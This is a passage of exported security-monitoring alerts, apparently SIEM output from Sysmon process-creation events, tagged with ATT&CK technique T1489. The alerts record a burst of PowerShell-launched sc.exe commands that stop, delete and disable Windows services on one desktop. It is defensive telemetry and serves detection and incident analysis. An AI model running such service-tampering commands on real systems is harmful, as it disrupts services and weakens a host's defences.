C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.985"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-00108f042b00}"",""processId"":""612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.738",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.951 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001045022b00} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.953859200Z"",""eventRecordID"":""3148"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.951\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001045022b00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.951"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001045022b00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.644",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.934 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001058012b00} +ProcessId: 7452 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.940269600Z"",""eventRecordID"":""3147"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.934\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001058012b00}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.934"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001058012b00}"",""processId"":""7452"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.427",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:25.857 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-0010e3fe2a00} +ProcessId: 6836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.863622600Z"",""eventRecordID"":""3144"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.857\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-0010e3fe2a00}\r\nProcessId: 6836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.857"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-0010e3fe2a00}"",""processId"":""6836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.439",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.583 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001065fa2a00} +ProcessId: 7672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.614863400Z"",""eventRecordID"":""3141"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.583\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001065fa2a00}\r\nProcessId: 7672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.583"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001065fa2a00}"",""processId"":""7672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.417",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.529 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001052f92a00} +ProcessId: 3620 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationaaal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationaaal Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.535698400Z"",""eventRecordID"":""3140"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.529\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-001052f92a00}\r\nProcessId: 3620\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationaaal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:25.529"",""processGuid"":""{df9fc3d3-b3cd-5ecf-0000-001052f92a00}"",""processId"":""3620"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationaaal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:53.383",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.070 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00107ef22a00} +ProcessId: 800 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.095602500Z"",""eventRecordID"":""3138"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.070\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00107ef22a00}\r\nProcessId: 800\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
